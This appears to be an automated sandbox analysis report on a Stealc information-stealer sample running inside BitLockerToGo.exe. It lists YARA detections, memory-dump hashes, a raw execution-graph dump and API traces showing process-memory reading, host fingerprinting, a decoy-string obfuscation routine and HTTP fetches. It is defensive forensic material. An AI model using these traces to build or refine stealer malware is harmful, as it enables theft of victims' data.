                                  Path:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Wow64 process (32bit):true
                                  Commandline:C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
                                  Imagebase:0x6e0000
                                  File size:231'736 bytes
                                  MD5 hash:A64BEAB5D4516BECA4C40B25DC0C1CD8
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 0000000B.00000002.2079531848.00000000032B7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate
                                  Has exited:true

                                    Memory Dump Source
                                    • Source File: 00000000.00000002.1735351085.00007FFD9B890000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B890000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_7ffd9b890000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                    • Instruction ID: 790f53b18bf535405e1566ca4fc67868e3ace26fd97990e01e1bad52e7daa871
                                    • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                    • Instruction Fuzzy Hash: 7401A73020CB0C4FDB48EF0CE451AA6B7E0FB89320F10056DE58AC36A1DA32E882CB41
                                    Memory Dump Source
                                    • Source File: 00000002.00000002.1725285083.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction ID: 2d8e5c199f5335979778887b622e34919a8febb75adba4d6537578fae4bb4e89
                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                    • Instruction Fuzzy Hash: 8601677121CB0D4FD748EF0CE451AA6B7E0FB99364F10056DE58AC36A5DA36E882CB45
                                    Memory Dump Source
                                    • Source File: 00000003.00000003.2359062498.000002376F810000.00000010.00000800.00020000.00000000.sdmp, Offset: 000002376F810000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_3_3_2376f810000_mshta.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                    • Instruction ID: 4f2e2da35085cc787484103cf7c442a14316674796d004457b72a027de24d145
                                    • Opcode Fuzzy Hash: 1634a2d688d49a259143009c50f36abdfda0d9cf4fcfe9a0a55bebbf17c78759
                                    • Instruction Fuzzy Hash: E090024449DD0B55D82551910C5B25C50446388190FD465C0541690184D44D03B66652

                                    Execution Graph

                                    Execution Coverage:13.6%
                                    Dynamic/Decrypted Code Coverage:0%
                                    Signature Coverage:0.7%
                                    Total number of Nodes:1508
                                    Total number of Limit Nodes:3
305b0c6 13883->13884 13885 3064c70 7 API calls 13884->13885 13886 305b2fd 13884->13886 13885->13886 13886->13850 13888 3059e70 memcmp 13887->13888 13891 3059f04 13887->13891 13889 3059e8c 13888->13889 13888->13891 13890 3059ea6 memset 13889->13890 13889->13891 13890->13891 13891->13866 13894 305e28d 13892->13894 13893 305e2f1 13893->13855 13894->13893 13895 305dc50 7 API calls 13894->13895 13895->13894 13897 30621e6 13896->13897 13909 306272b 13896->13909 13924 30560f0 13897->13924 13899 3062671 13900 30560f0 4 API calls 13899->13900 13901 3062698 13900->13901 13902 30560f0 4 API calls 13901->13902 13903 30626bc 13902->13903 13904 30560f0 4 API calls 13903->13904 13905 30626e3 13904->13905 13906 30560f0 4 API calls 13905->13906 13907 3062707 13906->13907 13908 30560f0 4 API calls 13907->13908 13908->13909 13909->13807 13914 305d8d6 13910->13914 13911 305d93a 13911->13809 13914->13911 13917 305d8c0 11 API calls 13914->13917 13928 305cd30 13914->13928 13934 305d240 13914->13934 13938 305c7d0 13914->13938 13946 305d5c0 13914->13946 13917->13914 13922 305f506 13918->13922 13919 305f56d 13919->13806 13920 305f4f0 8 API calls 13920->13922 13922->13919 13922->13920 13950 3068f70 13922->13950 13954 305f2e0 13922->13954 13925 3056109 13924->13925 13926 3054800 4 API calls 13925->13926 13927 3056115 ctype 13926->13927 13927->13899 13929 305cd46 13928->13929 13930 305d1c0 memset 13929->13930 13931 305d1d1 13929->13931 13932 3064c70 7 API calls 13929->13932 13930->13931 13931->13914 13933 305d1af 13932->13933 13933->13930 13935 305d256 13934->13935 13936 305d527 13935->13936 13937 3064c70 7 API calls 13935->13937 13936->13914 13937->13936 13940 305c7e4 13938->13940 13939 305ccbf 13939->13914 13940->13939 13941 305c8ee ??2@YAPAXI 13940->13941 13944 305c91f 13941->13944 13942 305cc7b 13943 3064c70 7 API calls 13942->13943 13943->13939 13944->13942 13945 305c660 memset memcpy 13944->13945 13945->13944 13948 305d5d6 13946->13948 13947 305d82e 13947->13914 13948->13947 13949 
3064c70 7 API calls 13948->13949 13949->13947 13958 306d220 13950->13958 13953 3068fa3 13953->13922 13956 305f2ff 13954->13956 13955 305f493 13955->13922 13956->13955 13960 305f140 13956->13960 13959 3068f7d memset 13958->13959 13959->13953 13961 305f153 13960->13961 13963 305f27c 13961->13963 13964 305eb60 13961->13964 13963->13955 13966 305eb71 13964->13966 13965 305ebaa 13965->13963 13966->13965 13967 3064c70 7 API calls 13966->13967 13968 305eb60 7 API calls 13966->13968 13967->13966 13968->13966 13969->13611 13972 3051726 ctype 13970->13972 13971 3051972 13971->13618 13972->13971 13973 3064c70 7 API calls 13972->13973 13973->13972 13976 3051344 13974->13976 13975 305152a 13975->13619 13976->13975 13977 3064c70 7 API calls 13976->13977 13978 30514d2 13976->13978 13977->13978 13979 305150b memset 13978->13979 13979->13975 13980->13623 13988 306a4a0 13981->13988 13983 30637ba strtok_s 13985 30637ce 13983->13985 13984 3063842 ctype 13984->13630 13985->13984 13987 3063857 strtok_s 13985->13987 13989 30633c0 13985->13989 13987->13985 13988->13983 13992 30633e2 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z ctype 13989->13992 13990 3063419 13990->13985 13991 30633c0 7 API calls 13991->13992 13992->13990 13992->13991 13993 3064c70 7 API calls 13992->13993 13993->13992 13994->13633 13996 3062956 13995->13996 13997 3062c6a 13996->13997 13998 3062ea8 13996->13998 14000 3062cf5 13996->14000 14001 3062b57 13996->14001 13997->13637 13999 30560f0 4 API calls 13998->13999 13999->13997 14002 30560f0 4 API calls 14000->14002 14003 30560f0 4 API calls 14001->14003 14002->13997 14003->13997 14006 30639d9 ctype 14004->14006 14005 30639ff ctype 14005->13641 14006->14005 14007 3064c70 7 API calls 14006->14007 14007->14006 14009 3066d9e 14008->14009 14012 3066b70 ??_U@YAPAXI 14009->14012 14011 3066dad 14011->13655 14027 306a110 14012->14027 14014 3066bb1 OpenProcess 14022 3066be8 construct 14014->14022 14026 3066bcb 14014->14026 14015 3066bf5 memset 14029 30669a0 strlen ??_U@YAPAXI 
14015->14029 14016 3066d4e ??_V@YAXPAX 14016->14026 14018 3066c79 ReadProcessMemory 14018->14022 14019 3066c65 14019->14016 14022->14015 14022->14016 14022->14018 14022->14019 14023 30580a0 memcpy codecvt 14022->14023 14024 3066d15 14022->14024 14036 3066dc0 14022->14036 14042 3066600 14022->14042 14023->14022 14056 30580a0 14024->14056 14026->14011 14028 306a120 14027->14028 14028->14014 14059 3066670 strlen 14029->14059 14031 3066a24 VirtualQueryEx 14032 3066b49 ??_V@YAXPAX 14031->14032 14035 3066a0c 14031->14035 14034 3066aa8 14032->14034 14033 3066880 ReadProcessMemory 14033->14035 14034->14022 14035->14031 14035->14033 14035->14034 14037 3066dd1 construct 14036->14037 14063 30582d0 14037->14063 14039 3066de5 14067 30582a0 14039->14067 14043 3066dc0 9 API calls 14042->14043 14044 3066613 14043->14044 14146 3066e40 14044->14146 14047 306664e 14154 30595a0 14047->14154 14048 306662f 14150 3066e70 14048->14150 14053 30580a0 codecvt memcpy 14055 3066649 14053->14055 14054 30580a0 codecvt memcpy 14054->14055 14055->14022 14057 30582d0 codecvt memcpy 14056->14057 14058 30580b3 task 14057->14058 14058->14026 14060 30666a1 strlen 14059->14060 14061 3066800 14060->14061 14062 30666b7 14060->14062 14061->14035 14062->14060 14064 30582e3 14063->14064 14066 30582e1 codecvt task 14063->14066 14064->14066 14072 3057230 memcpy 14064->14072 14066->14039 14073 3057210 strlen 14067->14073 14069 30582b0 14074 3058660 14069->14074 14071 30582c0 14071->14022 14072->14066 14073->14069 14075 3058673 14074->14075 14076 305869a 14075->14076 14077 305867a codecvt 14075->14077 14096 3058d10 14076->14096 14083 3058c50 14077->14083 14080 3058698 codecvt 14080->14071 14081 30586a8 codecvt 14081->14080 14105 3057230 memcpy 14081->14105 14084 3058c61 construct 14083->14084 14086 3058c6e construct 14084->14086 14106 3058720 14084->14106 14087 3058cb7 14086->14087 14088 3058c92 14086->14088 14090 3058d10 construct 7 API calls 14087->14090 14109 3058f80 14088->14109 14093 3058cc5 codecvt 
14090->14093 14091 3058ca7 14092 3058f80 construct 6 API calls 14091->14092 14095 3058cb5 codecvt 14092->14095 14093->14095 14115 3057230 memcpy 14093->14115 14095->14080 14097 3058d21 construct 14096->14097 14098 3058d2e 14097->14098 14124 3058df0 14097->14124 14100 3058d39 14098->14100 14103 3058d4e 14098->14103 14127 3059050 14100->14127 14102 3058d4c codecvt 14102->14081 14103->14102 14104 30582d0 codecvt memcpy 14103->14104 14104->14102 14105->14080 14116 306d320 14106->14116 14110 3058f94 14109->14110 14112 3058f9c codecvt 14109->14112 14111 3058720 construct 5 API calls 14110->14111 14111->14112 14114 3058fe9 codecvt 14112->14114 14123 3057250 memmove 14112->14123 14114->14091 14115->14095 14117 306a539 std::exception::exception strlen malloc strcpy_s 14116->14117 14118 306d33a 14117->14118 14119 306d394 __CxxThrowException@8 RaiseException 14118->14119 14120 306d34f 14119->14120 14121 306a5c7 std::exception::exception strlen malloc strcpy_s free 14120->14121 14122 3058731 14121->14122 14122->14086 14123->14114 14135 306d2d3 14124->14135 14129 3059086 construct 14127->14129 14142 3059220 14129->14142 14130 3059180 14132 30582d0 codecvt memcpy 14130->14132 14131 30590fe codecvt 14131->14130 14145 3057230 memcpy 14131->14145 14133 305918f codecvt 14132->14133 14133->14102 14136 306a539 std::exception::exception strlen malloc strcpy_s 14135->14136 14137 306d2ed 14136->14137 14138 306d394 __CxxThrowException@8 RaiseException 14137->14138 14139 306d302 14138->14139 14140 306a5c7 std::exception::exception strlen malloc strcpy_s free 14139->14140 14141 3058e01 14140->14141 14141->14098 14143 3059440 allocator 5 API calls 14142->14143 14144 3059232 14143->14144 14144->14131 14145->14130 14147 3066e4f construct codecvt 14146->14147 14160 3066f00 14147->14160 14149 3066621 14149->14047 14149->14048 14151 3066e85 14150->14151 14165 3066eb0 14151->14165 14155 30595b8 construct 14154->14155 14156 30582d0 codecvt memcpy 14155->14156 14157 30595cc 14156->14157 14158 
3058c50 construct 8 API calls 14157->14158 14159 30595dc 14158->14159 14159->14054 14162 3066f5e codecvt 14160->14162 14163 3066f14 codecvt 14160->14163 14162->14149 14163->14162 14164 30665e0 memchr 14163->14164 14164->14163 14166 3066ec5 construct 14165->14166 14167 30582d0 codecvt memcpy 14166->14167 14168 3066ed9 14167->14168 14169 3058c50 construct 8 API calls 14168->14169 14170 3066641 14169->14170 14170->14053 14172 3064066 14171->14172 14174 30640b2 ctype 14172->14174 14175 3064179 ctype 14172->14175 14177 3063d90 memset memset 14172->14177 14174->13661 14175->14174 14176 3064c70 7 API calls 14175->14176 14176->14174 14178 3063dea 14177->14178 14179 3059d30 2 API calls 14178->14179 14182 3063f7e ctype 14178->14182 14180 3063ea0 ctype 14179->14180 14181 3059e60 2 API calls 14180->14181 14180->14182 14181->14182 14182->14172 14186 3064412 ctype 14183->14186 14184 3064438 14184->13665 14185 30643f0 7 API calls 14185->14186 14186->14184 14186->14185 14187 3064c70 7 API calls 14186->14187 14187->14186 14193 3057310 14188->14193 14191 3057740 14191->13697 14192 305762b 14208 3058160 14192->14208 14194 305731d 14193->14194 14195 305732e memset 14194->14195 14206 3057380 14195->14206 14196 3057580 14233 3058120 14196->14233 14199 3058160 task memcpy 14200 305759a 14199->14200 14200->14192 14202 30580c0 9 API calls 14202->14206 14206->14196 14206->14202 14207 3059270 strcpy_s 14206->14207 14211 30575b0 14206->14211 14216 3059290 vsprintf_s 14206->14216 14217 30581a0 14206->14217 14228 30575e0 14206->14228 14207->14206 14209 3058560 task memcpy 14208->14209 14210 305816f task 14209->14210 14210->14191 14237 3058070 14211->14237 14214 3058070 memcpy 14215 30575cd 14214->14215 14215->14206 14216->14206 14218 30581b2 construct 14217->14218 14219 3058242 14218->14219 14222 30581c5 construct 14218->14222 14220 305825a 14219->14220 14221 30584f0 9 API calls 14219->14221 14252 30592d0 14220->14252 14221->14220 14223 30581f9 14222->14223 14241 30584f0 14222->14241 14248 
3059310 14223->14248 14226 305822e 14226->14206 14229 30580a0 codecvt memcpy 14228->14229 14230 30575f2 14229->14230 14231 30580a0 codecvt memcpy 14230->14231 14232 30575fd 14231->14232 14232->14206 14234 3058138 construct 14233->14234 14325 30583c0 14234->14325 14236 305758f 14236->14199 14238 3058081 construct 14237->14238 14239 30582d0 codecvt memcpy 14238->14239 14240 30575c2 14239->14240 14240->14214 14242 3058501 14241->14242 14243 3058514 14242->14243 14246 305851e 14242->14246 14256 3058b70 14243->14256 14245 305851c 14245->14223 14246->14245 14259 3058860 14246->14259 14249 305931c construct 14248->14249 14309 30594f0 14249->14309 14253 30592dc construct 14252->14253 14318 30594d0 14253->14318 14257 306d2d3 std::_Xinvalid_argument 5 API calls 14256->14257 14258 3058b81 14257->14258 14258->14245 14260 305888d 14259->14260 14261 3058892 14260->14261 14263 305889f 14260->14263 14262 3058b70 5 API calls 14261->14262 14268 305889a task 14262->14268 14263->14268 14270 3058ea0 14263->14270 14267 30588e2 14267->14268 14276 3058ae0 14267->14276 14268->14245 14279 30593e0 14270->14279 14273 3059330 14293 3059600 14273->14293 14301 3059360 14276->14301 14280 30593fc 14279->14280 14283 30588bf 14279->14283 14281 3059405 ??2@YAPAXI 14280->14281 14282 305941e 14280->14282 14281->14282 14281->14283 14287 3057180 14282->14287 14283->14273 14288 306a539 std::exception::exception strlen malloc strcpy_s 14287->14288 14289 3057193 14288->14289 14290 306d394 14289->14290 14291 306d3bd 14290->14291 14292 306d3c9 RaiseException 14290->14292 14291->14292 14292->14283 14294 3059611 _Copy_impl 14293->14294 14297 3059790 14294->14297 14300 30597bf 14297->14300 14298 3059310 construct 8 API calls 14298->14300 14299 305934f 14299->14267 14300->14298 14300->14299 14302 3059371 _Copy_impl 14301->14302 14305 3059660 14302->14305 14306 3059665 14305->14306 14307 3058afb 14306->14307 14308 3059850 task memcpy 14306->14308 14307->14268 14308->14306 14311 3059504 construct 14309->14311 14310 
305932c 14310->14226 14311->14310 14313 3059540 14311->14313 14314 30595a0 construct 8 API calls 14313->14314 14315 3059563 14314->14315 14316 30595a0 construct 8 API calls 14315->14316 14317 3059575 14316->14317 14317->14310 14321 30596d0 14318->14321 14323 30596e7 construct 14321->14323 14322 30592ec 14322->14226 14323->14322 14324 3059540 construct 8 API calls 14323->14324 14324->14322 14326 30583d6 14325->14326 14331 30583d1 std::error_category::default_error_condition 14325->14331 14327 3058457 14326->14327 14328 30583ff 14326->14328 14349 3058560 14327->14349 14334 3058a90 14328->14334 14331->14236 14332 3058407 construct 14332->14331 14338 3058740 14332->14338 14335 3058aa5 14334->14335 14353 3058e10 14335->14353 14339 3058752 construct 14338->14339 14340 30587ef 14339->14340 14342 3058769 construct 14339->14342 14341 30584f0 9 API calls 14340->14341 14344 3058807 construct 14340->14344 14341->14344 14343 30584f0 9 API calls 14342->14343 14346 305879d construct 14342->14346 14343->14346 14345 3059310 construct 8 API calls 14344->14345 14347 30587db 14345->14347 14348 3059310 construct 8 API calls 14346->14348 14347->14332 14348->14347 14350 305856f task 14349->14350 14352 305858c task 14349->14352 14351 3058ae0 task memcpy 14350->14351 14351->14352 14352->14331 14354 3058e29 std::error_category::default_error_condition 14353->14354 14355 3058acf 14354->14355 14359 30593a0 14354->14359 14355->14332 14358 3058ae0 task memcpy 14358->14355 14360 30593b1 _Copy_impl 14359->14360 14363 3059690 14360->14363 14365 3059695 construct 14363->14365 14364 3058e60 14364->14358 14365->14364 14366 3059720 _Copy_impl 8 API calls 14365->14366 14366->14365 14368 30689f9 14367->14368 14369 3068a07 malloc 14368->14369 14370 30689ff 14368->14370 14369->14370 14371 3068a25 14369->14371 14370->13753 14371->14370 14372 3068a6d memset 14371->14372 14372->14370 14373 3066490 14391 30522a0 14373->14391 14377 30664a0 14484 3051160 GetSystemInfo 14377->14484 14383 30664c1 14384 30664c6 
GetUserDefaultLangID 14383->14384 14385 30672f0 GetUserNameA 14384->14385 14386 30664d0 14385->14386 14387 3067380 GetComputerNameA 14386->14387 14389 30664e3 14387->14389 14388 30655f0 133 API calls 14390 30665b6 14388->14390 14389->14388 14392 3054610 34 API calls 14391->14392 14393 30522b4 14392->14393 14394 3054610 34 API calls 14393->14394 14395 30522cd 14394->14395 14396 3054610 34 API calls 14395->14396 14397 30522e6 14396->14397 14398 3054610 34 API calls 14397->14398 14399 30522ff 14398->14399 14400 3054610 34 API calls 14399->14400 14401 3052318 14400->14401 14402 3054610 34 API calls 14401->14402 14403 3052331 14402->14403 14404 3054610 34 API calls 14403->14404 14405 305234a 14404->14405 14406 3054610 34 API calls 14405->14406 14407 3052363 14406->14407 14408 3054610 34 API calls 14407->14408 14409 305237c 14408->14409 14410 3054610 34 API calls 14409->14410 14411 3052395 14410->14411 14412 3054610 34 API calls 14411->14412 14413 30523ae 14412->14413 14414 3054610 34 API calls 14413->14414 14415 30523c7 14414->14415 14416 3054610 34 API calls 14415->14416 14417 30523e0 14416->14417 14418 3054610 34 API calls 14417->14418 14419 30523f9 14418->14419 14420 3054610 34 API calls 14419->14420 14421 3052412 14420->14421 14422 3054610 34 API calls 14421->14422 14423 305242b 14422->14423 14424 3054610 34 API calls 14423->14424 14425 3052444 14424->14425 14426 3054610 34 API calls 14425->14426 14427 305245d 14426->14427 14428 3054610 34 API calls 14427->14428 14429 3052476 14428->14429 14430 3054610 34 API calls 14429->14430 14431 305248f 14430->14431 14432 3054610 34 API calls 14431->14432 14433 30524a8 14432->14433 14434 3054610 34 API calls 14433->14434 14435 30524c1 14434->14435 14436 3054610 34 API calls 14435->14436 14437 30524da 14436->14437 14438 3054610 34 API calls 14437->14438 14439 30524f3 14438->14439 14440 3054610 34 API calls 14439->14440 14441 305250c 14440->14441 14442 3054610 34 API calls 14441->14442 14443 3052525 14442->14443 14444 3054610 34 
API calls 14443->14444 14445 305253e 14444->14445 14446 3054610 34 API calls 14445->14446 14447 3052557 14446->14447 14448 3054610 34 API calls 14447->14448 14449 3052570 14448->14449 14450 3054610 34 API calls 14449->14450 14451 3052589 14450->14451 14452 3054610 34 API calls 14451->14452 14453 30525a2 14452->14453 14454 3054610 34 API calls 14453->14454 14455 30525bb 14454->14455 14456 3054610 34 API calls 14455->14456 14457 30525d4 14456->14457 14458 3054610 34 API calls 14457->14458 14459 30525ed 14458->14459 14460 3054610 34 API calls 14459->14460 14461 3052606 14460->14461 14462 3054610 34 API calls 14461->14462 14463 305261f 14462->14463 14464 3054610 34 API calls 14463->14464 14465 3052638 14464->14465 14466 3054610 34 API calls 14465->14466 14467 3052651 14466->14467 14468 3054610 34 API calls 14467->14468 14469 305266a 14468->14469 14470 3054610 34 API calls 14469->14470 14471 3052683 14470->14471 14472 3054610 34 API calls 14471->14472 14473 305269c 14472->14473 14474 3054610 34 API calls 14473->14474 14475 30526b5 14474->14475 14476 3054610 34 API calls 14475->14476 14477 30526ce 14476->14477 14478 3069270 14477->14478 14495 3069160 GetPEB 14478->14495 14480 30694a3 LoadLibraryA LoadLibraryA 14481 30694d3 LoadLibraryA 14480->14481 14482 30694f6 14481->14482 14482->14377 14483 3069278 14483->14480 14485 305117c 14484->14485 14486 3051110 14485->14486 14487 3051131 VirtualAllocExNuma 14486->14487 14488 3051141 14487->14488 14496 30510a0 VirtualAlloc 14488->14496 14490 305114e 14491 3051220 14490->14491 14498 3068450 14491->14498 14494 3051249 __aulldiv 14494->14383 14495->14483 14497 30510c2 ctype 14496->14497 14497->14490 14499 3051233 GlobalMemoryStatusEx 14498->14499 14499->14494

                                    Control-flow Graph

                                    APIs
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 0305461C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054627
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054632
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 0305463D
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054648
                                    • GetProcessHeap.KERNEL32(00000000,?,?,0000000F,?,0306649B), ref: 03054657
                                    • RtlAllocateHeap.NTDLL(00000000,?,0000000F,?,0306649B), ref: 0305465E
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 0305466C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054677
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054682
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 0305468D
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 03054698
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546AC
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546B7
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546C2
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546CD
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.,?,0000000F,?,0306649B), ref: 030546D8
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054701
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0305470C
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054717
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054722
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0305472D
                                    • strlen.MSVCRT ref: 03054740
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054768
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054773
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 0305477E
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054789
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 03054794
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547A4
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547AF
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547BA
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547C5
                                    • lstrlenA.KERNEL32(The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.), ref: 030547D0
                                    • VirtualProtect.KERNELBASE(?,00000004,00000100,00000000), ref: 030547EC
                                    Strings
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 030547B5
                                    • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 0305467D
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                    • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                                    • API String ID: 2127927946-2218711628
                                    • Opcode ID: e92fd9bfe955f1e4ba172cc5ea9bb00965487fe88c4eb3d75e7b44bd66e03f23
                                    • Instruction ID: 3e8d4ee8a058834b5db21d9223f99b8d22ecb2d90e3c32b92883b747ec783704
                                    • Opcode Fuzzy Hash: e92fd9bfe955f1e4ba172cc5ea9bb00965487fe88c4eb3d75e7b44bd66e03f23
                                    • Instruction Fuzzy Hash: 4341FC79A43704EFE718FBE4ED8DADD7B70AB49702B008060F5229D14EC6789581DB3A

                                    Control-flow Graph

                                    APIs
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 0305483A
                                      • Part of subcall function 03054800: ??_U@YAPAXI@Z.MSVCRT ref: 03054851
                                      • Part of subcall function 03054800: ??2@YAPAXI@Z.MSVCRT ref: 03054868
                                      • Part of subcall function 03054800: InternetCrackUrlA.WININET(00000000,00000000), ref: 03054899
                                    • InternetOpenA.WININET(03070DE6,00000001,00000000,00000000,00000000,03070DE3), ref: 03056331
                                    • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 03056385
                                    • HttpOpenRequestA.WININET(00000000,GET,?,?,00000000,00000000,00400100,00000000), ref: 030563D5
                                    • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 03056421
                                    • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 030564BD
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000B.00000002.2079380836.0000000003050000.00000040.00000400.00020000.00000000.sdmp, Offset: 03050000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_11_2_3050000_BitLockerToGo.jbxd
                                    Similarity
                                    • API ID: Internet$HttpOpenRequest$??2@ConnectCrackFileReadSend
                                    • String ID: ERROR$ERROR$GET
                                    • API String ID: 488451522-2509457195
